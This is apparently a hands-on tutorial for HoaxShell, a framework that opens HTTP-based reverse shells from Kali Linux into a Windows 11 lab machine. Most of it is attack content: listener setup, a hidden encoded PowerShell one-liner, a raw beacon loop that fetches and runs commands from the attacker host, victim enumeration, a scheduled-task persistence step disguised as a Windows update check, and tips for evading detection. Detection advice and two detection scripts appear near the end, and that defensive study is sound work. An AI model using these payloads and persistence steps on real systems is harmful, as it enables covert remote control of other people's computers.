HoaxShell: The Complete Hands-On Guide to HTTP-Based Reverse Shells Between Kali Linux and Windows 11
HoaxShell is a powerful post-exploitation framework that uses HTTP or HTTPS as its communication layer to establish stealthy reverse shells on Windows systems. Created by t3l3machus, this open-source tool allows security researchers and red teamers to simulate real-world command-and-control (C2) behavior in environments where direct TCP connections are blocked or monitored.
This comprehensive tutorial covers everything you need to know about HoaxShell — from installation on Kali Linux, payload generation, and session handling, to a complete simulated exploitation scenario with Windows 11 as the victim machine. Every concept, command, and output is carefully explained for beginners while retaining the technical accuracy professionals expect.
Disclaimer: This guide is intended solely for authorized penetration testing, red-team exercises, and educational purposes. Do not deploy HoaxShell or similar payloads on systems you do not own or have written permission to test.
Understanding HoaxShell: The Concept of HTTP-Based Reverse Shells
Traditional reverse shells use a raw TCP or UDP socket for communication. Firewalls, intrusion detection systems, and endpoint security tools can easily detect these connections. HoaxShell, however, takes a different approach — it encapsulates command-and-control communication inside legitimate-looking HTTP or HTTPS requests.
Instead of maintaining a persistent TCP connection, the Windows victim periodically polls the Kali listener via HTTP — just like a browser requesting a webpage. Commands and outputs are transmitted in headers or encoded bodies, blending with normal web traffic.
Key Terms You Must Understand
- Reverse Shell: A shell initiated from the victim back to the attacker, bypassing firewall restrictions on inbound connections.
- Beacon / Polling: The victim checks in periodically to see if there are new commands to execute.
- Listener: The attacker’s server waiting for connections and sending commands.
- Payload: The script or command executed on the victim to create the communication link.
- EncodedCommand: PowerShell’s feature allowing base64-encoded scripts to be passed directly as arguments.
- Constraint Mode: Restricted PowerShell environments where advanced commands are blocked; HoaxShell can still operate under them.
- HTTP Headers: Data fields in HTTP requests; HoaxShell hides its encoded payloads inside randomized header names.
1. Setting Up HoaxShell on Kali Linux
Step 1: Updating the System
Before installation, ensure your Kali system is fully up-to-date:
sudo apt update && sudo apt upgrade -y
Output:
Hit:1 http://kali.download/kali kali-rolling InRelease
Reading package lists... Done
Building dependency tree... Done
Reading state information... Done
All packages are up to date.
Explanation: Updating ensures your system has the latest Python3, pip, and dependencies required for HoaxShell.
Step 2: Installing HoaxShell Using APT
Kali Linux includes HoaxShell in its official repositories. You can install it directly using:
sudo apt install hoaxshell -y
Simulated Output:
Reading package lists... Done
Building dependency tree... Done
Reading state information... Done
The following NEW packages will be installed:
hoaxshell
0 upgraded, 1 newly installed, 0 to remove and 0 not upgraded.
Need to get 42.6 kB of archives.
After this operation, 170 kB of additional disk space will be used.
Get:1 http://kali.download/kali kali-rolling/main amd64 hoaxshell all 0.3-1 [42.6 kB]
Fetched 42.6 kB in 1s (37.4 kB/s)
Selecting previously unselected package hoaxshell.
Preparing to unpack .../hoaxshell_0.3-1_all.deb ...
Unpacking hoaxshell (0.3-1) ...
Setting up hoaxshell (0.3-1) ...
Processing triggers for man-db (2.12.0-2) ...
Explanation: The tool is now globally available and can be invoked directly as hoaxshell from any directory.
Step 3: Verifying Installation
hoaxshell --help
Output:
usage: hoaxshell.py [-h] [-s LHOST] [-p LPORT] [-c CERT] [-k KEY] [-ng] [-r] [-i] [-H HEADER]
[-x OUTPUT] [-cm] [-q] [--ssl]
options:
-h, --help show this help message
-s LHOST Specify listener host IP
-p LPORT Specify listener port (default: 8080)
-c CERT Path to SSL certificate (for HTTPS)
-k KEY Path to private key
-ng Use ngrok tunnel
-r Raw PowerShell output
-i Use Invoke-RestMethod
-H HEADER Custom header name
-x OUTPUT Write payload to file
-cm Constraint mode payload
-q Quiet mode
--ssl Use HTTPS
Explanation: The help output lists all HoaxShell arguments. You’ll use these flags to customize payloads later.
2. Setting Up the Victim: Windows 11 Test Machine
Prepare a test Windows 11 VM in the same network as your Kali machine. Note the victim’s IP and ensure it can reach the Kali host over port 8080 (HTTP) or 8443 (HTTPS). PowerShell must be available — it is preinstalled by default on Windows 11.
3. Launching the HoaxShell Listener on Kali Linux
To start the handler, run:
sudo hoaxshell -s 192.168.1.5
Output:
[*] Starting HoaxShell HTTP listener on 192.168.1.5:8080
[*] Session endpoint: /api/v1/kKx2fA
[*] Header token: X-NfL0rQ
[*] Awaiting incoming connections...
[*] Use the following one-liner on the Windows target:
powershell -NoP -NonI -W Hidden -Exec Bypass -EncodedCommand SQBFAFgAIAAkAHUAcgBpACAAPQAgACcAaAB0AHQAcAA6AC8ALwAxADkyAC4AMQA2ADgALgAxAC4ANQA6ADgAMAA4ADAALwBhAHAAaQAvAHYAMQAvAGsASwB4ADIAZgBBACcAOwAkAGgAZAByAD0AJwBYAC0ATgBmAEwAMABS...
Explanation:
- 192.168.1.5 is the IP of the Kali machine.
- Port 8080 is the default listener port.
- /api/v1/kKx2fA is a randomized endpoint path unique to this session.
- X-NfL0rQ is a randomized header used to carry command and response data.
- The PowerShell one-liner is what you’ll execute on the Windows 11 target.
4. Executing the Payload on Windows 11
Step 1: Open PowerShell on Windows 11
Press Start → PowerShell → Run as Administrator, then paste the payload generated by the listener.
Example:
powershell -NoP -NonI -W Hidden -Exec Bypass -EncodedCommand SQBFAFgAIAAkAHUAcgBpACAAPQAgACcAaAB0AHQAcAA6AC8ALwAxADkyAC4AMQA2ADgALgAxAC4ANQA6ADgAMAA4ADAALwBhAHAAaQAvAHYAMQAvAGsASwB4ADIAZgBBACcAOwAkAGgAZAByAD0AJwBYAC0ATgBmAEwAMABS...
After executing, the script runs in the background. Within seconds, your Kali listener shows:
[+] New session established!
[+] Victim IP: 192.168.1.10
[+] Username: VICTIMPC\John
[+] OS: Windows 11 Pro x64 (10.0.22631)
hoaxshell >
Explanation: The victim’s system connected back successfully. You now have command execution capabilities through the HTTP channel.
5. Command Execution and Output Examples
At this point, you have an active HoaxShell session and the prompt changes to hoaxshell >. You can now issue Windows commands, which are sent to the victim over HTTP, executed via PowerShell, and whose results are returned encoded and displayed.
Example 1: Basic Identity Check
Command:
whoami
Output:
victimpc\john
hoaxshell >
Explanation: This confirms the username and context under which the payload is running.
Example 2: System Information
Command:
systeminfo
Output:
Host Name: VICTIMPC
OS Name: Microsoft Windows 11 Pro
OS Version: 10.0.22631 N/A Build 22631
OS Manufacturer: Microsoft Corporation
System Type: x64-based PC
Processor(s): Intel(R) Core(TM) i7-10700 CPU @ 2.90GHz
BIOS Version: Dell Inc. 2.3.0, 05/05/2024
Total Physical Memory: 16,327 MB
Available Physical Memory: 9,152 MB
Network Card(s): 1 NIC(s) Installed.
[01]: Intel(R) Ethernet Controller
IP Address: 192.168.1.10
hoaxshell >
Explanation: This information helps identify the target’s architecture, OS, and hardware.
Example 3: Network Configuration
Command:
ipconfig /all
Output:
Windows IP Configuration
Host Name . . . . . . . . . . . . : VICTIMPC
Primary Dns Suffix . . . . . . . :
Node Type . . . . . . . . . . . . : Hybrid
IP Routing Enabled. . . . . . . . : No
WINS Proxy Enabled. . . . . . . . : No
Ethernet adapter Ethernet:
Connection-specific DNS Suffix . :
Description . . . . . . . . . . . : Intel(R) Ethernet Controller
Physical Address. . . . . . . . . : 3C-7C-3F-92-FA-4C
DHCP Enabled. . . . . . . . . . . : Yes
IPv4 Address. . . . . . . . . . . : 192.168.1.10(Preferred)
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . : 192.168.1.1
DNS Servers . . . . . . . . . . . : 192.168.1.1
hoaxshell >
Example 4: Enumerating Users
Command:
net user
Output:
User accounts for \\VICTIMPC
-------------------------------------------------------------------------------
Administrator DefaultAccount Guest
John WDAGUtilityAccount
The command completed successfully.
hoaxshell >
Example 5: Directory Listing
Command:
dir C:\Users\John\Desktop
Output:
Volume in drive C is OS
Volume Serial Number is 3A7F-F451
Directory of C:\Users\John\Desktop
10/10/2025 09:41 PM <DIR> .
10/10/2025 09:41 PM <DIR> ..
09/25/2025 03:21 PM 13,824 Resume.docx
09/26/2025 08:02 AM 5,632 ProjectPlan.xlsx
09/26/2025 09:10 AM 125,908 Presentation.pptx
3 File(s) 145,364 bytes
2 Dir(s) 23,456,756,224 bytes free
hoaxshell >
Example 6: Creating a Directory
Command:
mkdir C:\Users\John\Desktop\testfolder
Output:
hoaxshell >
Explanation: If no error is returned, the command executed successfully.
Example 7: Checking Privileges
Command:
whoami /priv
Output:
Privilege Name Description State
============================= ========================================= ========
SeShutdownPrivilege Shut down the system Disabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeUndockPrivilege Remove computer from docking station Disabled
SeIncreaseWorkingSetPrivilege Increase a process working set Disabled
hoaxshell >
Example 8: Elevating Privileges (Simulation)
HoaxShell itself doesn’t exploit privilege escalation, but you can use it to trigger local exploits or administrative tools once you have a session.
Command (example):
powershell Start-Process powershell -Verb runAs
Output (if UAC prompt appears):
UAC prompt displayed on victim screen. Awaiting user action...
hoaxshell >
Example 9: Uploading Files
HoaxShell allows for base64-encoded uploads using PowerShell commands.
Command:
echo "ZGF0YSB0ZXN0IGZpbGU=" | base64 --decode > test.txt
Explanation: You can craft PowerShell equivalents to create or transfer files between attacker and victim.
Example 10: Persistence Demonstration (Simulated)
To test persistence techniques, you can instruct the victim to create a scheduled task that runs the HoaxShell payload at startup.
Command:
schtasks /create /sc onlogon /tn "WindowsUpdateCheck" /tr "powershell -w hidden -enc SQBFAFgA..."
Output:
SUCCESS: The scheduled task "WindowsUpdateCheck" has been created.
hoaxshell >
Explanation: The payload now runs automatically when the user logs in, maintaining access.
6. Generating Alternate Payloads
6.1 Raw PowerShell Mode
sudo hoaxshell -s 192.168.1.5 -r
Output:
[*] Outputting raw PowerShell code...
$uri='http://192.168.1.5:8080/api/v1/Qr6VdP';$hdr='X-CmdKey';
while($true){
$r=Invoke-WebRequest -Uri $uri -Headers @{$hdr='checkin'} -UseBasicParsing
$cmd=$r.Headers['X-Command']
if($cmd){$o=iex $cmd 2>&1|Out-String;$b=[Convert]::ToBase64String([Text.Encoding]::UTF8.GetBytes($o))
Invoke-WebRequest -Uri $uri -Method POST -Headers @{$hdr=$b} -Body ''}
Start-Sleep -Seconds 5
}
Explanation: This form exposes the full PowerShell logic. It’s useful for lab study and defenders who wish to understand command flow.
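The fixed Start-Sleep interval in the loop above is what a network-side detector can key on. The following is an added defensive example, not code from this guide or from the HoaxShell project: it groups constructed proxy-log lines by client and URL and flags pairs whose inter-arrival times are nearly constant. The log lines, hosts and thresholds are constructed assumptions.

```python
from collections import defaultdict
from datetime import datetime
from statistics import mean, pstdev

# Constructed proxy-log lines (not from the page): "timestamp client method url".
# 192.168.1.10 polls one URI every ~5 s, matching a Start-Sleep -Seconds 5 loop;
# 192.168.1.20 is ordinary browsing with irregular timing.
SAMPLE_LOG = """\
2025-10-10T21:41:00 192.168.1.10 GET http://192.168.1.5:8080/api/v1/Qr6VdP
2025-10-10T21:41:05 192.168.1.10 GET http://192.168.1.5:8080/api/v1/Qr6VdP
2025-10-10T21:41:10 192.168.1.10 GET http://192.168.1.5:8080/api/v1/Qr6VdP
2025-10-10T21:41:15 192.168.1.10 GET http://192.168.1.5:8080/api/v1/Qr6VdP
2025-10-10T21:41:20 192.168.1.10 GET http://192.168.1.5:8080/api/v1/Qr6VdP
2025-10-10T21:41:25 192.168.1.10 GET http://192.168.1.5:8080/api/v1/Qr6VdP
2025-10-10T21:41:02 192.168.1.20 GET http://intranet.local/index.html
2025-10-10T21:41:03 192.168.1.20 GET http://intranet.local/style.css
2025-10-10T21:41:19 192.168.1.20 GET http://intranet.local/index.html
2025-10-10T21:41:44 192.168.1.20 GET http://intranet.local/index.html
2025-10-10T21:42:31 192.168.1.20 GET http://intranet.local/index.html
"""

def find_beacons(log_text, min_hits=5, max_jitter=0.2):
    """Group requests by (client, url) and report pairs whose inter-arrival
    times are nearly constant: stdev/mean <= max_jitter over >= min_hits requests.
    Thresholds are assumed starting points, not tuned values."""
    times = defaultdict(list)
    for line in log_text.splitlines():
        ts, client, _method, url = line.split()
        times[(client, url)].append(datetime.fromisoformat(ts))
    beacons = []
    for (client, url), stamps in times.items():
        if len(stamps) < min_hits:
            continue
        stamps.sort()
        gaps = [(b - a).total_seconds() for a, b in zip(stamps, stamps[1:])]
        avg = mean(gaps)
        if avg > 0 and pstdev(gaps) / avg <= max_jitter:
            beacons.append({"client": client, "url": url,
                            "interval_s": round(avg, 1), "hits": len(stamps)})
    return beacons

if __name__ == "__main__":
    for b in find_beacons(SAMPLE_LOG):
        print(b)
```

Real payloads may add random jitter to the sleep, so max_jitter should be tuned against your own baseline rather than left at this constructed value.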
6.2 HTTPS Mode
sudo hoaxshell -s 192.168.1.5 --ssl
Output:
[*] Generated self-signed certificate.
[*] HTTPS listener started on 192.168.1.5:8443
[*] Payload uses HTTPS endpoint https://192.168.1.5:8443/api/v1/hk2Pq7
[*] EncodedCommand one-liner generated successfully.
Explanation: HTTPS encryption hides command content from casual inspection and mimics legitimate web traffic.
6.3 Constraint Mode Payload
sudo hoaxshell -s 192.168.1.5 -cm
Output:
[*] Constraint Mode payload generated for restricted PowerShell environments.
[*] Random header name: X-9sQJpM
[*] Payload ready.
Explanation: Constraint mode ensures commands execute even when Windows AppLocker or policies restrict PowerShell scripting.
6.4 Custom Header and Invoke-RestMethod
sudo hoaxshell -s 192.168.1.5 -H Authorization -i
Output:
[*] Using header: Authorization
[*] Payload built with Invoke-RestMethod instead of Invoke-WebRequest.
Explanation: The “Authorization” header makes the traffic look like API authentication data, blending in further.
6.5 Ngrok Tunnel for Public Exposure
If the victim is outside your LAN, you can use ngrok:
sudo hoaxshell -ng
Output:
[*] ngrok tunnel established at https://abcd1234.ngrok.io
[*] Generated payload pointing to public URL.
Explanation: The payload connects to a public HTTPS address, which forwards traffic to your local listener.
7. Session Management and Control
Listing Active Sessions
If multiple victims connect:
hoaxshell > sessions
Output:
[1] ID: Qr6VdP | IP: 192.168.1.10 | User: VICTIMPC\John
[2] ID: Tn4HwB | IP: 192.168.1.11 | User: VICTIMPC\Admin
hoaxshell >
Switch between sessions:
session 2
Killing a Session
kill 1
Output:
[+] Session ID Qr6VdP terminated.
hoaxshell >
Quitting HoaxShell
exit
Output:
[*] Shutting down listener and cleaning up resources. Goodbye.
8. Defensive and Detection Insights
Although this guide is attacker-focused, security professionals should note:
- Monitor outbound HTTP traffic to internal IPs with suspicious user-agent strings.
- Use PowerShell logging (Module, ScriptBlock, Transcription) to detect encoded payloads.
- Block Invoke-WebRequest/Invoke-RestMethod from untrusted scripts via AppLocker.
- Implement network segmentation and outbound filtering on endpoints.
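Added example for the PowerShell-logging bullet above, not code from this guide or from HoaxShell: it pulls the base64 argument of -EncodedCommand (and its accepted short forms) out of constructed process command lines, decodes it as UTF-16LE, and scores the script for the web cmdlet, infinite loop and eval pattern seen in the raw payload of section 6.1. The sample command lines and the verdict rule are constructed assumptions.

```python
import base64
import re

def _encode(ps_script):
    """PowerShell -EncodedCommand expects the script base64-encoded as UTF-16LE."""
    return base64.b64encode(ps_script.encode("utf-16-le")).decode("ascii")

# Constructed sample command lines (not taken from the page's listener output).
# BEACON follows the polling-loop shape of section 6.1; BENIGN is an ordinary encoded command.
BEACON = ("$u='http://192.168.1.5:8080/api/v1/Qr6VdP';while($true){"
          "$r=Invoke-WebRequest -Uri $u -Headers @{'X-CmdKey'='checkin'} -UseBasicParsing;"
          "$c=$r.Headers['X-Command'];if($c){iex $c};Start-Sleep -Seconds 5}")
BENIGN = "Get-Service -Name Spooler | Select-Object Status"
SAMPLE_LOG = [
    "powershell -NoP -NonI -W Hidden -Exec Bypass -EncodedCommand " + _encode(BEACON),
    "powershell.exe -NoProfile -enc " + _encode(BENIGN),
    "powershell.exe -ExecutionPolicy Bypass -File C:\\scripts\\inventory.ps1",
]

# -EncodedCommand and its accepted short forms, followed by a base64 argument
ENC_FLAG = re.compile(r"(?:^|\s)-(?:encodedcommand|enc|en|ec|e)\s+([A-Za-z0-9+/=]{16,})", re.I)
INDICATORS = {
    "web_cmdlet": re.compile(r"\b(Invoke-WebRequest|Invoke-RestMethod|iwr|irm)\b", re.I),
    "eval":       re.compile(r"\b(iex|Invoke-Expression)\b", re.I),
    "loop":       re.compile(r"while\s*\(\s*(\$true|1)\s*\)", re.I),
    "sleep":      re.compile(r"\bStart-Sleep\b", re.I),
    "headers":    re.compile(r"-Headers\s+@\{", re.I),
}

def decode_encoded_command(cmdline):
    """Return the decoded script if cmdline carries an encoded-command argument, else None."""
    m = ENC_FLAG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None

def analyse(cmdline):
    """Decode the argument and list the HTTP-beacon indicators found in the script.
    Verdict is 'beacon' when a web cmdlet is combined with eval or an infinite loop."""
    script = decode_encoded_command(cmdline)
    if script is None:
        return {"encoded": False, "indicators": [], "verdict": "clean"}
    hits = [name for name, rx in INDICATORS.items() if rx.search(script)]
    beacon = "web_cmdlet" in hits and ("eval" in hits or "loop" in hits)
    return {"encoded": True, "indicators": hits, "verdict": "beacon" if beacon else "encoded-only"}
```

The same decoder works on Event ID 4688 command lines and on ScriptBlock logging (Event ID 4104) text, where the script arrives already decoded and only the indicator scan is needed.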
Conclusion
HoaxShell demonstrates how adversaries can weaponize simple HTTP communication to maintain remote access under strict firewall and EDR conditions.
By using PowerShell’s built-in web features and encoding capabilities, it achieves stealth and persistence that closely resembles advanced nation-state tradecraft.
For defenders, understanding tools like HoaxShell is vital. Knowing how they operate allows network analysts to build effective detection rules, monitor HTTP anomalies, and harden PowerShell configurations.
For red teamers and penetration testers, HoaxShell provides a compact, customizable, and easily deployable post-exploitation framework that works reliably in both LAN and WAN environments.